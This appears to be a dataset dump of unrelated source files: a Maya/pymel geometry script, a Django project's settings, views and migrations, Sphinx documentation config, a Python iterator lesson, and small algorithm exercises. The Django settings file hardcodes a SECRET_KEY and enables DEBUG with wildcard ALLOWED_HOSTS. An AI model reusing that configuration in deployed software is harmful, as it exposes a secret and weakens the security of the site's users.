| 2021-01-18T08:00:47.123047
| 2015-03-30T08:10:35
| 2015-03-30T08:10:35
| 33,191,651
| 2
| 2
| null | 2015-03-31T14:57:41
| 2015-03-31T14:57:41
| null |
UTF-8
|
Python
| false
| false
| 1,333
|
py
|
import pymel.core as pm
import math
def loc(x,y,z=0):
loc = pm.spaceLocator()
loc.translate.set((x,y,z))
loc.getShape().localScale.set(.05, .05, .05)
# the hypoytenuse
crv = pm.PyNode('crv')
pos_list = crv.getCVs()
r = 1.0
circ_center = pm.datatypes.Vector(2,1,0)
mid_vec = pos_list[1] - pos_list[0]
#The angle of the mid vector, i.e. the shared hypotenuse
theta = math.atan2(pos_list[1].y, pos_list[1].x)
#print(pm.util.degrees(theta))
# the angle we need to rpotate from positive x axis to the theta angle
ang = math.pi + theta
#ang_deg = pm.util.degrees(ang)
# the angle between theta and the oposite side of the right triangle (1.5 PI)
dif_ang = math.pi*1.5 - ang
num_points = 5
ang_inc = dif_ang / (num_points+1)
for i in range(num_points):
#dif_ang_half = dif_ang * .5
rot = ang + ang_inc * (i+1)
rot_deg = pm.util.degrees(rot)
#line = pm.curve(d=1, p=[(0,0,0), (2,0,0)])
#line.translate.set(2,1,0)
#line.rotate.set(0,0,rot_deg)
x = (math.cos(rot)) + circ_center.x
y = (math.sin(rot)) + circ_center.y
pos = pm.datatypes.Vector(x,y,0)
loc(pos.x, pos.y, pos.z)
# reflect around the mid vec
reflect_pos = 2 * pos.dot(mid_vec) / mid_vec.dot(mid_vec) * mid_vec - pos
loc(reflect_pos.x, reflect_pos.y, reflect_pos.z)
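For reference, the `reflect_pos` line is the standard reflection of a point about a line through the origin with direction `mid_vec`, restated in vector notation:

```latex
p' = 2\,\frac{p \cdot m}{m \cdot m}\,m - p
```

that is, twice the orthogonal projection of `p` onto `m`, minus `p`, which is exactly what `2 * pos.dot(mid_vec) / mid_vec.dot(mid_vec) * mid_vec - pos` computes.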
|
[
"johan@Johans-Mac-Pro.local"
] |
johan@Johans-Mac-Pro.local
|
90543404593bfada9faff01457b9d19d4ec39de2
|
812b5bb1110d1853ef6978c93fc88b7ae53a0813
|
/aquaara/settings.py
|
d902773b8b1c77bb88487af504e2466552ae2461
|
[] |
no_license
|
SamuelSilvaAraujo/aquaara
|
841ff1350c04c700c068be4bb885764fe8a4fdc6
|
8f84464c0bfd050e61fa3e2827b7747b58ab81ec
|
refs/heads/master
| 2022-12-27T08:50:46.153919
| 2020-10-10T01:15:18
| 2020-10-10T01:15:18
| 302,781,085
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,482
|
py
|
"""
Django settings for aquaara project.
Generated by 'django-admin startproject' using Django 2.1.5.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'ull0(&j9=w37aioq+)@yzd80^yyh$3-mo11b5oy&8f+f%%1-e!'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = ['*']
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'users',
'core',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'aquaara.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'aquaara.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
# {
# 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
# },
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_ROOT = '../static/'
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, "static"),
'static/',
]
AUTH_USER_MODEL = 'users.User'
LOGIN_URL = 'login'
LOGOUT_URL = 'logout'
LOGIN_REDIRECT_URL = 'property_list'
LOGOUT_REDIRECT_URL = 'login'
try:
from local_settings import *
except ImportError:
pass
|
[
"samuelsas.samuel18@gmail.com"
] |
samuelsas.samuel18@gmail.com
|
9ef14bf76e360aeb512485962327cc1cc8cd093f
|
7616b18f708dbced335db0b93b736bdf6445cbce
|
/test.py
|
15a2b070abf0028c0018ccb5274d6b95ca0e13a8
|
[] |
no_license
|
jireland88/percolation
|
311d43a652624d29e1f683ef3f4d418238496808
|
d0de18b9aafd6a055be35be7de32a50e5ca0832f
|
refs/heads/main
| 2023-05-01T00:08:21.135928
| 2021-05-16T22:44:09
| 2021-05-16T22:44:09
| 361,247,692
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 222
|
py
|
from percolation import *
from path_helpers import *
from path_finders import *
iters = 50
P_05 = Percolation(np.zeros((5, 5)), RecPathFinder(TriangleNeighbours()))
PT = PercolationTools(P_05)
PT.plot_centre_prob(50, 1)
|
[
"jakeireland88@protonmail.com"
] |
jakeireland88@protonmail.com
|
19c4b0d54104cd06b5b95603cea72a1da9812988
|
a3e09d68b73f3090c240920073bf285ce1ee0238
|
/docs/source/conf.py
|
649e6ddeba86419a555adef0d981dcad6450b24b
|
[
"MIT"
] |
permissive
|
rmorshea/jotting
|
8750fc044c898c96e25b6acda4eadd0f57726cee
|
bad834f6bec1af049cabd1a4dc10504ea849de03
|
refs/heads/master
| 2021-09-20T08:28:23.465095
| 2018-03-04T02:06:30
| 2018-03-04T02:06:30
| 109,722,665
| 3
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,563
|
py
|
# -*- coding: utf-8 -*-
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/stable/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
# -- Project information -----------------------------------------------------
project = 'Jotting'
copyright = '2018, Ryan Morshead'
author = 'Ryan Morshead'
# The short X.Y version
version = ''
# The full version, including alpha/beta/rc tags
release = '0.2.1'
import os
import sys
sys.path.insert(0, os.path.dirname(os.path.abspath('..')))
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
# needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
'sphinx.ext.autodoc',
'sphinx.ext.doctest',
'sphinx.ext.coverage',
'sphinx.ext.viewcode',
'sphinx.ext.autosummary',
'sphinxcontrib.napoleon',
]
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = None
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path .
exclude_patterns = []
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'manni'
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
import sphinx_materialdesign_theme
html_theme = 'sphinx_materialdesign_theme'
html_theme_options = {
# Specify a list of menu in Header.
# Tuples forms:
# ('Name', 'external url or path of pages in the document', boolean, 'icon name')
#
# Third argument:
# True indicates an external link.
# False indicates path of pages in the document.
#
# Fourth argument:
# Specify the icon name.
# For details see link.
# https://material.io/icons/
'header_links' : [
('Home', 'index', False, 'home'),
("GitHub", "https://github.com/rmorshea/jotting", True, 'link')
],
# Customize css colors.
# For details see link.
# https://getmdl.io/customize/index.html
#
# Values: amber, blue, brown, cyan deep_orange, deep_purple, green, grey, indigo, light_blue,
# light_green, lime, orange, pink, purple, red, teal, yellow(Default: indigo)
'primary_color': 'blue',
# Values: Same as primary_color. (Default: pink)
'accent_color': 'deep_purple',
# Customize layout.
# For details see link.
# https://getmdl.io/components/index.html#layout-section
'fixed_drawer': True,
'fixed_header': True,
'header_waterfall': True,
'header_scroll': False,
# Render title in header.
# Values: True, False (Default: False)
'show_header_title': False,
# Render title in drawer.
# Values: True, False (Default: True)
'show_drawer_title': True,
# Render footer.
# Values: True, False (Default: True)
'show_footer': True
}
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['.static']
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = 'jottingdoc'
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(master_doc, 'jotting.tex', 'Jotting Documentation',
'Ryan Morshead', 'manual'),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(master_doc, 'Jotting', 'Jotting Documentation',
[author], 1)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(master_doc, 'Jotting', 'Jotting Documentation',
author, 'Jotting', 'One line description of project.',
'Miscellaneous'),
]
# -- Extension configuration -------------------------------------------------
|
[
"ryan.morshead@gmail.com"
] |
ryan.morshead@gmail.com
|
d10be5267e00090902d64733b7fc541f9f2561ef
|
ae596ab3ea6acca7265c2043aef0a9b9558f12b0
|
/Django/django-ex 3.0.2/ZTraining/F/views.py
|
71ac645374609770bcb9005e19c4d071dff77ea0
|
[] |
no_license
|
LexusLight/PythonLearn
|
4013edf7b83aec7ab63d54c39617272c43eee584
|
1b62c28d4619f757e0d3691e444d61d69cc3c91f
|
refs/heads/master
| 2021-09-08T20:00:41.696775
| 2021-09-01T22:39:23
| 2021-09-01T22:39:23
| 192,084,614
| 1
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,658
|
py
|
from django.shortcuts import render
from django.http import HttpResponseRedirect,HttpResponse,HttpResponsePermanentRedirect, HttpRequest
from django.views.generic import View  # for creating class-based views
from .models import User, Message
from .forms import UserForm
# Create your views here.
def reg(request):
# if request.COOKIES is not None:
# x = request.COOKIES.get("x")
# else:
# x = 2
# x = 2
if 'x' in request.session and 'username' in request.session:
x = request.session['x']
else:
x = 2
if(x == 1):
username = request.session['username']
user = User.objects.get(username = username)
return render(request, 'user.html', {"user":user})
elif(x == 2):
form = UserForm()
return render(request, 'reg.html', {"form":form})
def exit(request):
resp = HttpResponsePermanentRedirect('/C')
# resp.set_cookie('x',2)
del request.session['x']
request.session['x'] = 2
del request.session['username']
return resp
class RegObr(View):
def post(self,request):
form = UserForm(self.request.POST)
if form.is_valid():
user = User(username = form.cleaned_data['username'],realname = form.cleaned_data['realname'])
user.save()
            resp = HttpResponseRedirect('/C')  # Set cookies. Not working yet.
# resp.set_cookie('x',1,max_age=10000)
request.session['x'] = 1
request.session['username'] = form.cleaned_data['username']
return resp
else:
return HttpResponseRedirect('/C')
|
[
"kostyaelizarov@mail.ru"
] |
kostyaelizarov@mail.ru
|
c975b1b26eec3465191ab42aad5a295e15539372
|
3cb8680bdf40e36a60952691f14a46c7ab912c74
|
/Map/migrations/0001_initial.py
|
b70afdfc3ed7271a2efef301b84e1e946a07c345
|
[] |
no_license
|
MichaelMa2014/CivilAviation
|
3a81a4f5a281de3fc10fc0aa2f1c70f17dd0cf7b
|
e7ec921b589f10c6dcd340e0eff249e3878ffd76
|
refs/heads/master
| 2021-06-11T19:28:45.400398
| 2017-03-04T02:58:59
| 2017-03-04T02:58:59
| 64,899,037
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,676
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-01-22 17:50
from __future__ import unicode_literals
import Map.models
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Record',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('airline_code2', models.TextField()),
('lon', models.FloatField()),
('_id', models.TextField()),
('airport_icao_code', models.TextField()),
('num5', models.IntegerField()),
('typecode', models.TextField()),
('first_in', models.FloatField()),
('airline_code1', models.TextField()),
('lat', models.FloatField()),
('flight', models.TextField()),
('height', models.IntegerField()),
('num3', models.IntegerField()),
('airport_dep', models.TextField()),
('timestamp', models.TextField()),
('idshex', models.TextField()),
('str1', models.TextField()),
('num2', models.IntegerField()),
('last_modify', models.FloatField()),
('zone_range', Map.models.ListField(default=[])),
('airport_arr', models.TextField()),
('num1', models.IntegerField()),
('num4', models.IntegerField()),
('fid', models.TextField()),
],
),
]
|
[
"ljl_buaa@126.com"
] |
ljl_buaa@126.com
|
625c33aedcdbc5998354b305955b42568c3b3411
|
caceb60f71165772b6d6155f619e79189e7c80a9
|
/第一期/杭州-冬/第二次任务/iter_eg.py
|
03278430ce85f5d7610e38e2ec3e82ebd219e29e
|
[
"Apache-2.0"
] |
permissive
|
beidou9313/deeptest
|
ff41999bb3eb5081cdc8d7523587d7bc11be5fea
|
e046cdd35bd63e9430416ea6954b1aaef4bc50d5
|
refs/heads/master
| 2021-04-26T23:06:08.890071
| 2019-04-03T02:18:44
| 2019-04-03T02:18:44
| 123,931,080
| 0
| 0
|
Apache-2.0
| 2018-03-05T14:25:54
| 2018-03-05T14:25:53
| null |
UTF-8
|
Python
| false
| false
| 1,487
|
py
|
#--coding:utf-8--
# Iteration: visiting the elements of a container from start to end, e.g. with a
# for-in loop. Objects that can be iterated over this way are called "iterables";
# traversal simply means visiting every element.
## Use isinstance() to check whether an object is of a given type; here, whether
## it is an iterable.
from collections.abc import Iterable
from collections.abc import Iterator
list_1 = [0, 1, 2]
print(isinstance(list_1, Iterable))
# Check whether it is an iterator
print(isinstance(list_1, Iterator))
# Iterator: an object that can be passed to next() and returns the next value.
# The two basic operations for iterators are iter() and next().
# list, str, tuple, dict and the like can be traversed with a for loop, so they
# are iterables, but they are not iterators.
## An iterable can be turned into an iterator with iter()
it_list = iter(list_1)
# Call next() on the newly created iterator
print("first element of the iterator: %d" % next(it_list))
print("second element of the iterator: %d" % next(it_list))
print("third element of the iterator: %d" % next(it_list))
# An iterator can still be traversed from the start, in one pass, with a for-in loop.
it_list = iter(list_1)
for i in it_list:
    print(i)
# An Iterable is not necessarily an Iterator, but an Iterator is always an Iterable.
# An Iterator can represent an arbitrarily large (even infinite) data stream,
# because it does not store all the elements up front; it only keeps the rule for
# computing the next one. next() computes the next value on demand and does not
# keep it afterwards.
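# An added illustration (not part of the original lesson): a minimal custom
# iterator. Implementing __iter__ and __next__ makes a class work with both
# next() and for-in.
class Countdown:
    def __init__(self, start):
        self.current = start
    def __iter__(self):
        return self
    def __next__(self):
        if self.current <= 0:
            raise StopIteration
        value = self.current
        self.current -= 1
        return value

for n in Countdown(3):
    print(n)  # prints 3, 2, 1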
|
[
"lw20140705@163.com"
] |
lw20140705@163.com
|
605e989d78c320d738acb3228b5b0603b16caddb
|
ce59a94a69b8fe3def1ff78960c5e2f0e39a722b
|
/scenes/plugins/scene_stretchgoals.py
|
8c24eed97969eb31d36629ef0c411150e81389c2
|
[
"Apache-2.0"
] |
permissive
|
pretix/pretix-screenshots
|
8503165edae82b4aedd0bccdc26e55d590114a97
|
5956ca3f8baf7ff38e59cb8f571134ce1bf2a6aa
|
refs/heads/master
| 2022-10-15T15:36:12.298581
| 2022-10-07T14:19:27
| 2022-10-07T14:19:27
| 98,909,158
| 15
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,253
|
py
|
import json
import random
import time
from datetime import timedelta
import pytest
from decimal import Decimal
from django.conf import settings
from django.utils.timezone import now
from django.utils.translation import gettext as _
from selenium.webdriver.common.by import By
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from pretix.base.models import Order, OrderPayment
from ..utils import screenshot
@pytest.mark.django_db
@pytest.mark.skipif(
'pretix_stretchgoals' not in settings.INSTALLED_APPS,
reason='Plugin not installed.'
)
def shot_stretchgoals(live_server, organizer, event, logged_in_client):
event.plugins += ',pretix_stretchgoals'
event.save()
eb = event.items.create(name=_('Early-bird ticket'), default_price=23, admission=True)
regular = event.items.create(name=_('Regular ticket'), default_price=26, admission=True)
event.settings.stretchgoals_items = '{},{}'.format(eb.pk, regular.pk)
event.settings.stretchgoals_chart_averages = True
event.settings.stretchgoals_chart_totals = True
event.settings.stretchgoals_is_public = True
event.settings.stretchgoals_goals = json.dumps([
{
'name': _('Break-even'),
'total': 10000,
'amount': 435,
'description': ''
},
{
'name': _('We can have a party'),
'total': 20000,
'amount': 435,
'description': ''
}
])
for day in range(30):
d = now() - timedelta(days=day)
order = event.orders.create(
status=Order.STATUS_PAID,
email='admin@localhost',
expires=now(),
datetime=d,
total=Decimal("23"),
locale='en'
)
order.payments.create(
provider='banktransfer',
amount=order.total,
payment_date=d,
state=OrderPayment.PAYMENT_STATE_CONFIRMED
)
num = max(0, random.randint(25, 45) - day)
for l in range(num):
if day > 15:
order.positions.create(
item=regular, price=Decimal('23.00')
)
else:
order.positions.create(
item=regular, price=Decimal('26.00')
)
logged_in_client.get(live_server.url + '/control/event/{}/{}/stretchgoals/settings/'.format(
organizer.slug, event.slug
))
screenshot(logged_in_client, 'plugins/stretchgoals/settings.png')
logged_in_client.get(live_server.url + '/control/event/{}/{}/stretchgoals/'.format(
organizer.slug, event.slug
))
WebDriverWait(logged_in_client, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "#avg_chart svg"))
)
time.sleep(.5)
screenshot(logged_in_client, 'plugins/stretchgoals/backend.png')
logged_in_client.get(live_server.url + '/{}/{}/stats/'.format(
organizer.slug, event.slug
))
WebDriverWait(logged_in_client, 10).until(
EC.presence_of_element_located((By.CSS_SELECTOR, "#avg_chart svg"))
)
time.sleep(.5)
screenshot(logged_in_client, 'plugins/stretchgoals/frontend.png')
|
[
"mail@raphaelmichel.de"
] |
mail@raphaelmichel.de
|
0882fcb47bebd1dc53eb867eef4cf8a6fec37fe4
|
4d8b3f23d6de766425d71264a854fd85569eb239
|
/generateConfig.py
|
6a136320f7cd7a3bb6f5ccfeace038dd1366d821
|
[
"MIT"
] |
permissive
|
BrendanHalley/infping
|
3f07a5178fed4531ce5076c6b7c8cd0a882b68c4
|
32c52befd7fce45c3d9a5dde1eb2af6a13c5a64e
|
refs/heads/master
| 2020-07-28T21:00:57.622546
| 2020-02-16T23:11:43
| 2020-02-16T23:11:43
| 209,536,587
| 0
| 0
|
MIT
| 2019-09-19T11:29:34
| 2019-09-19T11:29:34
| null |
UTF-8
|
Python
| false
| false
| 510
|
py
|
import urllib.request
import re
regex = r"(\[.*\].*\[(.*)\])"
url = 'https://raw.githubusercontent.com/jlu5/netmeter.club/confv2/Targets-Shared'
response = urllib.request.urlopen(url)
data = response.read()
text = data.decode('utf-8')
matches = re.finditer(regex, text, re.MULTILINE)
for matchNum, match in enumerate(matches, start=1):
print("[hosts."+match.groups()[1].replace(".", "_")+"]")
print("ip = \""+match.groups()[1]+"\"")
print("description = \""+match.groups()[0]+"\"")
print()
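# Illustrative output shape (hypothetical host entry, not taken from the real
# target list): each regex match becomes one [hosts.*] block, presumably pasted
# into infping's TOML config.
#
# [hosts.example_com]
# ip = "example.com"
# description = "[Some Label] comment [example.com]"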
|
[
"bhalley@Brendans-MacBook-Pro.local"
] |
bhalley@Brendans-MacBook-Pro.local
|
c86b71c71ec2eedf029e8a7c177ed3564e14f23c
|
34ae7274b072b9eb84c0b94e99a1ee6b3bc2c926
|
/Python/Python_base/lesson_003/03_division.py
|
e47beabf5bcb72537f7edcfa585a0a01080ce937
|
[] |
no_license
|
Alister-uz/lessons
|
6541636b9432045e2859a8838441b2c4116aca53
|
6d4ead2f95f893e91a7ba75ccadaaec0caf3759b
|
refs/heads/master
| 2022-12-14T16:15:31.128064
| 2020-09-05T16:24:17
| 2020-09-05T16:24:17
| 289,890,393
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 763
|
py
|
# -*- coding: utf-8 -*-
# (while loop)
# Given positive integers a and b (a > b),
# determine the integer quotient of a divided by b using a while loop,
# WITHOUT using any division operation: no floating-point division /,
# no integer division //, and no remainder %.
# Output format:
# Integer division of XXX by YYY gives ZZZ
a, b = 179, 37
whole, x = 0, a
while x >= b:
    whole += 1
    x -= b
print('Integer division of', a, 'by', b, 'gives', whole)
# passed! 🚀
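# A small extension (added, not part of the original exercise): after the loop,
# x holds the remainder, so the same subtraction loop yields both quotient and
# remainder, matching the built-in divmod().
def divmod_by_subtraction(a, b):
    whole, x = 0, a
    while x >= b:
        whole += 1
        x -= b
    return whole, x

print(divmod_by_subtraction(179, 37))  # (4, 31), same as divmod(179, 37)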
|
[
"khasankhodjaev@gmail.com"
] |
khasankhodjaev@gmail.com
|
6fb551cdb3e28ef196baa88670818bd52cc39b38
|
41adb4208413fe73ac43db4b427ad44f15bf8ea7
|
/python/vinicius/PC_MeanShift_simulated/sim_6/pc4/par_0.6/config.py
|
1acf9dc87c6b15d988039c673a8f5254e25759ac
|
[] |
no_license
|
emilleishida/MLSNeSpectra
|
daebb13307586e0450f32c87495dcf0ef3f59c10
|
182640f93b68722dbd4ca5e45916b849daa65da4
|
refs/heads/master
| 2016-09-15T17:01:09.570337
| 2015-12-08T16:17:25
| 2015-12-08T16:17:25
| 42,939,754
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,954
|
py
|
#####################################################################################
'''
Original data:
Used for the reduction,
not needed if doing clustering only
'''
ORG_DATA = '/home/vinicius/MLSNeSpectra/python/SN_simulator/simulated_data/6/derivatives.dat'
#####################################################################################
'''
REDUCTION METHOD
possibilities:
-pca
The additional parameters must be added with the same name
as in the original function plus the prefix REDUCTION_METHOD'_'.
Example:
if REDUCTION_METHOD is 'pca', the parameter
n_components must be declared as
pca_n_components= ...
if REDUCTION_METHOD is 'empca', the parameter
error_file can be declared as
empca_errors_file= ...
in order to run with weights=1/errors^2. Its default value is
None, so empca runs without weights
'''
REDUCTION_METHOD = 'pca'
pca_n_components = 4
#####################################################################################
'''
CLUSTERING METHOD
possibilities:
-MeanShift
-KMeans
-AffinityPropagation
-AgglomerativeClustering
-DBSCAN
The additional parameters must be added with the same name
as in the original function plus the prefix CLUSTERING_METHOD'_'
Example:
if CLUSTERING_METHOD is 'MeanShift', the parameter
quantile must be declared as
MeanShift_quantile= ...
'''
CLUSTERING_METHOD = 'MeanShift'
MeanShift_quantile = 0.6
#####################################################################################
'''
CLUSTERING OUTPUT EXTENSIONS
extension of output plots produced by pylab
'''
PLOT_EXT = '.png'
PLOT_SPEC_EXT = '.pdf'
#####################################################################################
'''
QUALITY TEST METHODS
put one or more (as a vector) quality checks for clustering. possibilities are:
-silhouette_index
-Dunn_index
-DavisBouldin_index
-vrc
'''
QUALITY_METHODS=['silhouette_index','Dunn_index','DavisBouldin_index','vrc']
#####################################################################################
'''
CLUSTERING INPUT DATA
add this ONLY if you want to use an external data source for the clustering,
if you want to use the data from the pipeline leave it commented.
Be aware that this data will also go into the plotting.
'''
#REDUCED_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
#####################################################################################
'''
PLOTTING INPUT DATA
add this ONLY if you want to use an external data source of the clusters for the plotting,
if you want to use the data from the pipeline leave it commented.
You can also add an external file with different labels to set different colors
to the reduced data. The default color scheme is according to each parent cluster.
'''
#CLUSTERS_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
#LABELS_DATA_EXTERNAL = '../empca_trained_coeff/coefficients.dat'
|
[
"viniciusbusti@gmail.com"
] |
viniciusbusti@gmail.com
|
fdd7f8ee95f616f5aa5372945a0110179f64cea7
|
4c499782655f8e929a5dd6b39d6c5d378fcfd7bd
|
/power_with_addition.py
|
1d4fa1bd5ca75f69b37dd4de46f043bd736e9f2f
|
[] |
no_license
|
IanCBrown/practice_questions
|
53a3fd66bee807f6e30e6d57632966f146c704c9
|
838b94c26cd3c26b76c3908277944a3b5f9bc7c7
|
refs/heads/master
| 2021-08-06T07:14:57.237709
| 2020-04-16T05:03:33
| 2020-04-16T05:03:33
| 149,521,025
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 216
|
py
|
def power(a, b):
    # compute a**b using only addition
    if b == 0:
        return 1
    prev = a
    total = a
    for i in range(b - 1):
        for j in range(a - 1):
            total += prev  # add the previous power a-1 times: total becomes prev * a
        prev = total
    return total
print(power(5,3))
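# Quick sanity check against the built-in operator (added, not in the original file):
for base in range(1, 6):
    for exp in range(4):
        assert power(base, exp) == base ** exp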
|
[
"icb0004@auburn.edu"
] |
icb0004@auburn.edu
|
947e7d0b2f584aa3d47e30ea9438057dd592df00
|
75dcb56e318688499bdab789262839e7f58bd4f6
|
/_algorithms_challenges/leetcode/lc-all-solutions/543.diameter-of-binary-tree/diameter-of-binary-tree.py
|
925bed2373395d7fcfc71f9d53c052df1004c1c8
|
[] |
no_license
|
syurskyi/Algorithms_and_Data_Structure
|
9a1f358577e51e89c862d0f93f373b7f20ddd261
|
929dde1723fb2f54870c8a9badc80fc23e8400d3
|
refs/heads/master
| 2023-02-22T17:55:55.453535
| 2022-12-23T03:15:00
| 2022-12-23T03:15:00
| 226,243,987
| 4
| 1
| null | 2023-02-07T21:01:45
| 2019-12-06T04:14:10
|
Jupyter Notebook
|
UTF-8
|
Python
| false
| false
| 537
|
py
|
# Definition for a binary tree node.
# class TreeNode(object):
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Solution(object):
def diameterOfBinaryTree(self, root):
"""
:type root: TreeNode
:rtype: int
"""
self.ans = 0
def dfs(root):
if not root:
return 0
left = dfs(root.left)
right = dfs(root.right)
self.ans = max(self.ans, left + right)
return max(left, right) + 1
dfs(root)
return self.ans
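# Example usage (added for illustration; TreeNode defined as in the header comment).
# The tree below has its longest path 4 -> 2 -> 1 -> 3, which is 3 edges long.
class TreeNode(object):
    def __init__(self, x):
        self.val = x
        self.left = None
        self.right = None

root = TreeNode(1)
root.left, root.right = TreeNode(2), TreeNode(3)
root.left.left, root.left.right = TreeNode(4), TreeNode(5)
print(Solution().diameterOfBinaryTree(root))  # 3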
|
[
"sergejyurskyj@yahoo.com"
] |
sergejyurskyj@yahoo.com
|
d5e07aa271294e9efcb13756857b8b1a8a51f9c5
|
b7864b7beb3567cfd84877f887958b67065cb58d
|
/mypractice/app/migrations/0002_new_database_course.py
|
87582416929397acbcfc5c097ca9402a2a313d4c
|
[] |
no_license
|
AliMalik9599/MyPractice
|
2d63710c35fe403a1be260acda031550487cc1e6
|
4175bfe92caa349e47025f3f1e72c98b5853a821
|
refs/heads/main
| 2023-03-10T05:13:54.851456
| 2020-12-21T13:46:53
| 2020-12-21T13:46:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 11,135
|
py
|
from django.db import migrations, models
from app.models import Course, Skill, Card
import datetime
schema = 'Answer the following question based on this schema: </br> branch(branch-name, branch-city, assets) </br> ' \
'customer(customer-name, customer-street, customer-city) </br> account(branch-name, account-number, balance) </br> ' \
